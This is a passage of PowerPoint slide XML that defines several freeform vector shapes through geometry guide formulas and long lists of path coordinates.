                      <a:pt x="231" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="572"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="320" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="320" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="598"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="593"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="593"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="582"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="414" y="682"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="414" y="682"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="373" y="693"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="373" y="693"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="325" y="703"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="325" y="703"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="714"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="714"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="714"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="714"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="703"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="703"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="688"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="661"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="661"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="593"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173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70" name="Freeform 35"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4500563" y="1131888"/>
                <a:ext cx="161925" cy="287337"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 189 w 448"/>
                  <a:gd name="T1" fmla="*/ 688 h 799"/>
                  <a:gd name="T2" fmla="*/ 189 w 448"/>
                  <a:gd name="T3" fmla="*/ 688 h 799"/>
                  <a:gd name="T4" fmla="*/ 221 w 448"/>
                  <a:gd name="T5" fmla="*/ 677 h 799"/>
                  <a:gd name="T6" fmla="*/ 232 w 448"/>
                  <a:gd name="T7" fmla="*/ 667 h 799"/>
                  <a:gd name="T8" fmla="*/ 236 w 448"/>
                  <a:gd name="T9" fmla="*/ 656 h 799"/>
                  <a:gd name="T10" fmla="*/ 236 w 448"/>
                  <a:gd name="T11" fmla="*/ 656 h 799"/>
                  <a:gd name="T12" fmla="*/ 247 w 448"/>
                  <a:gd name="T13" fmla="*/ 630 h 799"/>
                  <a:gd name="T14" fmla="*/ 247 w 448"/>
                  <a:gd name="T15" fmla="*/ 599 h 799"/>
                  <a:gd name="T16" fmla="*/ 0 w 448"/>
                  <a:gd name="T17" fmla="*/ 74 h 799"/>
                  <a:gd name="T18" fmla="*/ 147 w 448"/>
                  <a:gd name="T19" fmla="*/ 48 h 799"/>
                  <a:gd name="T20" fmla="*/ 294 w 448"/>
                  <a:gd name="T21" fmla="*/ 415 h 799"/>
                  <a:gd name="T22" fmla="*/ 300 w 448"/>
                  <a:gd name="T23" fmla="*/ 415 h 799"/>
                  <a:gd name="T24" fmla="*/ 305 w 448"/>
                  <a:gd name="T25" fmla="*/ 21 h 799"/>
                  <a:gd name="T26" fmla="*/ 447 w 448"/>
                  <a:gd name="T27" fmla="*/ 0 h 799"/>
                  <a:gd name="T28" fmla="*/ 400 w 448"/>
                  <a:gd name="T29" fmla="*/ 536 h 799"/>
                  <a:gd name="T30" fmla="*/ 400 w 448"/>
                  <a:gd name="T31" fmla="*/ 536 h 799"/>
                  <a:gd name="T32" fmla="*/ 394 w 448"/>
                  <a:gd name="T33" fmla="*/ 599 h 799"/>
                  <a:gd name="T34" fmla="*/ 383 w 448"/>
                  <a:gd name="T35" fmla="*/ 651 h 799"/>
                  <a:gd name="T36" fmla="*/ 383 w 448"/>
                  <a:gd name="T37" fmla="*/ 651 h 799"/>
                  <a:gd name="T38" fmla="*/ 373 w 448"/>
                  <a:gd name="T39" fmla="*/ 693 h 799"/>
                  <a:gd name="T40" fmla="*/ 357 w 448"/>
                  <a:gd name="T41" fmla="*/ 725 h 799"/>
                  <a:gd name="T42" fmla="*/ 357 w 448"/>
                  <a:gd name="T43" fmla="*/ 725 h 799"/>
                  <a:gd name="T44" fmla="*/ 331 w 448"/>
                  <a:gd name="T45" fmla="*/ 751 h 799"/>
                  <a:gd name="T46" fmla="*/ 305 w 448"/>
                  <a:gd name="T47" fmla="*/ 767 h 799"/>
                  <a:gd name="T48" fmla="*/ 305 w 448"/>
                  <a:gd name="T49" fmla="*/ 767 h 799"/>
                  <a:gd name="T50" fmla="*/ 268 w 448"/>
                  <a:gd name="T51" fmla="*/ 777 h 799"/>
                  <a:gd name="T52" fmla="*/ 226 w 448"/>
                  <a:gd name="T53" fmla="*/ 788 h 799"/>
                  <a:gd name="T54" fmla="*/ 169 w 448"/>
                  <a:gd name="T55" fmla="*/ 798 h 799"/>
                  <a:gd name="T56" fmla="*/ 147 w 448"/>
                  <a:gd name="T57" fmla="*/ 693 h 799"/>
                  <a:gd name="T58" fmla="*/ 147 w 448"/>
                  <a:gd name="T59" fmla="*/ 693 h 799"/>
                  <a:gd name="T60" fmla="*/ 189 w 448"/>
                  <a:gd name="T61" fmla="*/ 688 h 7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48" h="799">
                    <a:moveTo>
                      <a:pt x="189" y="688"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="189" y="688"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="677"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="232" y="667"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="656"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="656"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="630"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="599"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="305" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="447" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="400" y="536"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="400" y="536"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="599"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="651"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="651"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="373" y="693"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="725"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="725"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="751"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="305" y="767"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="305" y="767"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="777"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="788"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="798"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="693"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="693"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="688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75" name="Freeform 5"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6546612" y="3950847"/>
              <a:ext cx="2629523" cy="2201971"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 4688 w 7403"/>
                <a:gd name="T1" fmla="*/ 2237 h 6201"/>
                <a:gd name="T2" fmla="*/ 4709 w 7403"/>
                <a:gd name="T3" fmla="*/ 2200 h 6201"/>
                <a:gd name="T4" fmla="*/ 4673 w 7403"/>
                <a:gd name="T5" fmla="*/ 2163 h 6201"/>
                <a:gd name="T6" fmla="*/ 4289 w 7403"/>
                <a:gd name="T7" fmla="*/ 2174 h 6201"/>
                <a:gd name="T8" fmla="*/ 4284 w 7403"/>
                <a:gd name="T9" fmla="*/ 2216 h 6201"/>
                <a:gd name="T10" fmla="*/ 4494 w 7403"/>
                <a:gd name="T11" fmla="*/ 4274 h 6201"/>
                <a:gd name="T12" fmla="*/ 4394 w 7403"/>
                <a:gd name="T13" fmla="*/ 4305 h 6201"/>
                <a:gd name="T14" fmla="*/ 4332 w 7403"/>
                <a:gd name="T15" fmla="*/ 4384 h 6201"/>
                <a:gd name="T16" fmla="*/ 4321 w 7403"/>
                <a:gd name="T17" fmla="*/ 4489 h 6201"/>
                <a:gd name="T18" fmla="*/ 4368 w 7403"/>
                <a:gd name="T19" fmla="*/ 4578 h 6201"/>
                <a:gd name="T20" fmla="*/ 4494 w 7403"/>
                <a:gd name="T21" fmla="*/ 4631 h 6201"/>
                <a:gd name="T22" fmla="*/ 4594 w 7403"/>
                <a:gd name="T23" fmla="*/ 4599 h 6201"/>
                <a:gd name="T24" fmla="*/ 4662 w 7403"/>
                <a:gd name="T25" fmla="*/ 4520 h 6201"/>
                <a:gd name="T26" fmla="*/ 4673 w 7403"/>
                <a:gd name="T27" fmla="*/ 4416 h 6201"/>
                <a:gd name="T28" fmla="*/ 4620 w 7403"/>
                <a:gd name="T29" fmla="*/ 4326 h 6201"/>
                <a:gd name="T30" fmla="*/ 4494 w 7403"/>
                <a:gd name="T31" fmla="*/ 4274 h 6201"/>
                <a:gd name="T32" fmla="*/ 3895 w 7403"/>
                <a:gd name="T33" fmla="*/ 2457 h 6201"/>
                <a:gd name="T34" fmla="*/ 3854 w 7403"/>
                <a:gd name="T35" fmla="*/ 2525 h 6201"/>
                <a:gd name="T36" fmla="*/ 3874 w 7403"/>
                <a:gd name="T37" fmla="*/ 4142 h 6201"/>
                <a:gd name="T38" fmla="*/ 5066 w 7403"/>
                <a:gd name="T39" fmla="*/ 4163 h 6201"/>
                <a:gd name="T40" fmla="*/ 5119 w 7403"/>
                <a:gd name="T41" fmla="*/ 4142 h 6201"/>
                <a:gd name="T42" fmla="*/ 5140 w 7403"/>
                <a:gd name="T43" fmla="*/ 2525 h 6201"/>
                <a:gd name="T44" fmla="*/ 5093 w 7403"/>
                <a:gd name="T45" fmla="*/ 2457 h 6201"/>
                <a:gd name="T46" fmla="*/ 0 w 7403"/>
                <a:gd name="T47" fmla="*/ 6200 h 6201"/>
                <a:gd name="T48" fmla="*/ 5240 w 7403"/>
                <a:gd name="T49" fmla="*/ 5985 h 6201"/>
                <a:gd name="T50" fmla="*/ 5350 w 7403"/>
                <a:gd name="T51" fmla="*/ 5571 h 6201"/>
                <a:gd name="T52" fmla="*/ 5528 w 7403"/>
                <a:gd name="T53" fmla="*/ 5192 h 6201"/>
                <a:gd name="T54" fmla="*/ 5765 w 7403"/>
                <a:gd name="T55" fmla="*/ 4857 h 6201"/>
                <a:gd name="T56" fmla="*/ 6059 w 7403"/>
                <a:gd name="T57" fmla="*/ 4563 h 6201"/>
                <a:gd name="T58" fmla="*/ 6394 w 7403"/>
                <a:gd name="T59" fmla="*/ 4326 h 6201"/>
                <a:gd name="T60" fmla="*/ 6773 w 7403"/>
                <a:gd name="T61" fmla="*/ 4148 h 6201"/>
                <a:gd name="T62" fmla="*/ 7187 w 7403"/>
                <a:gd name="T63" fmla="*/ 4038 h 6201"/>
                <a:gd name="T64" fmla="*/ 7402 w 7403"/>
                <a:gd name="T65" fmla="*/ 0 h 6201"/>
                <a:gd name="T66" fmla="*/ 6316 w 7403"/>
                <a:gd name="T67" fmla="*/ 127 h 6201"/>
                <a:gd name="T68" fmla="*/ 5292 w 7403"/>
                <a:gd name="T69" fmla="*/ 425 h 6201"/>
                <a:gd name="T70" fmla="*/ 4352 w 7403"/>
                <a:gd name="T71" fmla="*/ 882 h 6201"/>
                <a:gd name="T72" fmla="*/ 3502 w 7403"/>
                <a:gd name="T73" fmla="*/ 1486 h 6201"/>
                <a:gd name="T74" fmla="*/ 2762 w 7403"/>
                <a:gd name="T75" fmla="*/ 2211 h 6201"/>
                <a:gd name="T76" fmla="*/ 2147 w 7403"/>
                <a:gd name="T77" fmla="*/ 3050 h 6201"/>
                <a:gd name="T78" fmla="*/ 1670 w 7403"/>
                <a:gd name="T79" fmla="*/ 3985 h 6201"/>
                <a:gd name="T80" fmla="*/ 1355 w 7403"/>
                <a:gd name="T81" fmla="*/ 4998 h 6201"/>
                <a:gd name="T82" fmla="*/ 200 w 7403"/>
                <a:gd name="T83" fmla="*/ 6001 h 6201"/>
                <a:gd name="T84" fmla="*/ 5334 w 7403"/>
                <a:gd name="T85" fmla="*/ 4563 h 6201"/>
                <a:gd name="T86" fmla="*/ 5224 w 7403"/>
                <a:gd name="T87" fmla="*/ 4689 h 6201"/>
                <a:gd name="T88" fmla="*/ 3927 w 7403"/>
                <a:gd name="T89" fmla="*/ 4736 h 6201"/>
                <a:gd name="T90" fmla="*/ 3770 w 7403"/>
                <a:gd name="T91" fmla="*/ 4689 h 6201"/>
                <a:gd name="T92" fmla="*/ 3659 w 7403"/>
                <a:gd name="T93" fmla="*/ 4563 h 6201"/>
                <a:gd name="T94" fmla="*/ 3638 w 7403"/>
                <a:gd name="T95" fmla="*/ 2163 h 6201"/>
                <a:gd name="T96" fmla="*/ 3722 w 7403"/>
                <a:gd name="T97" fmla="*/ 1964 h 6201"/>
                <a:gd name="T98" fmla="*/ 3869 w 7403"/>
                <a:gd name="T99" fmla="*/ 1885 h 6201"/>
                <a:gd name="T100" fmla="*/ 5124 w 7403"/>
                <a:gd name="T101" fmla="*/ 1885 h 6201"/>
                <a:gd name="T102" fmla="*/ 5271 w 7403"/>
                <a:gd name="T103" fmla="*/ 1964 h 6201"/>
                <a:gd name="T104" fmla="*/ 5355 w 7403"/>
                <a:gd name="T105" fmla="*/ 2163 h 6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403" h="6201">
                  <a:moveTo>
                    <a:pt x="4315" y="2237"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4673" y="2237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4673" y="2237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4688" y="2237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4704" y="2226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4709" y="2216"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4709" y="2200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4709" y="2200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4709" y="2184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4704" y="2174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4688" y="2168"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4673" y="2163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4315" y="2163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4315" y="2163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4300" y="2168"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4289" y="2174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4284" y="2184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4279" y="2200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4279" y="2200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4284" y="2216"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4289" y="2226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4300" y="2237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4315" y="2237"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="4494" y="4274"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4494" y="4274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4457" y="4279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4426" y="4284"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4394" y="4305"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4368" y="4326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4368" y="4326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4347" y="4352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4332" y="4384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4321" y="4416"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4315" y="4452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4315" y="4452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4321" y="4489"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4332" y="4520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4347" y="4552"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4368" y="4578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4368" y="4578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4394" y="4599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4426" y="4615"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4457" y="4626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4494" y="4631"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4494" y="4631"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4531" y="4626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4562" y="4615"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4594" y="4599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4620" y="4578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4620" y="4578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4646" y="4552"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4662" y="4520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4673" y="4489"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4673" y="4452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4673" y="4452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4673" y="4416"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4662" y="4384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4646" y="4352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4620" y="4326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4620" y="4326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4594" y="4305"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4562" y="4284"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4531" y="4279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4494" y="4274"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="5066" y="2452"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3927" y="2452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3927" y="2452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3895" y="2457"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3874" y="2473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3874" y="2473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3859" y="2494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3854" y="2525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3854" y="4095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3854" y="4095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3859" y="4122"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3874" y="4142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3874" y="4142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3895" y="4158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3927" y="4163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5066" y="4163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5066" y="4163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5093" y="4158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5119" y="4142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5119" y="4142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5134" y="4122"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5140" y="4095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5140" y="2525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5140" y="2525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5134" y="2494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5119" y="2473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5119" y="2473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5093" y="2457"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5066" y="2452"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1355" y="4998"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="4998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="6200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5208" y="6200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5208" y="6200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5224" y="6090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5240" y="5985"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5261" y="5880"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5281" y="5775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5313" y="5675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5350" y="5571"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5387" y="5476"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5428" y="5381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5476" y="5287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5528" y="5192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5581" y="5104"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5638" y="5019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5701" y="4935"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5765" y="4857"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5833" y="4778"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5906" y="4704"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5980" y="4631"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6059" y="4563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6137" y="4499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6221" y="4436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6306" y="4379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6394" y="4326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6489" y="4274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6583" y="4226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6678" y="4185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6773" y="4148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6877" y="4111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6977" y="4079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7082" y="4059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7187" y="4038"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7292" y="4022"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7402" y="4006"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7402" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7402" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7124" y="16"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6851" y="42"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6583" y="79"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6316" y="127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6053" y="184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5796" y="257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5544" y="336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5292" y="425"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5050" y="525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4809" y="635"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4578" y="756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4352" y="882"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4127" y="1019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3911" y="1166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3701" y="1323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3502" y="1486"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3302" y="1654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3113" y="1833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2935" y="2016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2762" y="2211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2594" y="2410"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2436" y="2620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2289" y="2830"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2147" y="3050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2011" y="3277"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1890" y="3507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1774" y="3744"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1670" y="3985"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1575" y="4232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1491" y="4484"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1417" y="4741"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1355" y="4998"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="200" y="6001"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="200" y="5198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="903" y="5602"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="200" y="6001"/>
                  </a:lnTo>
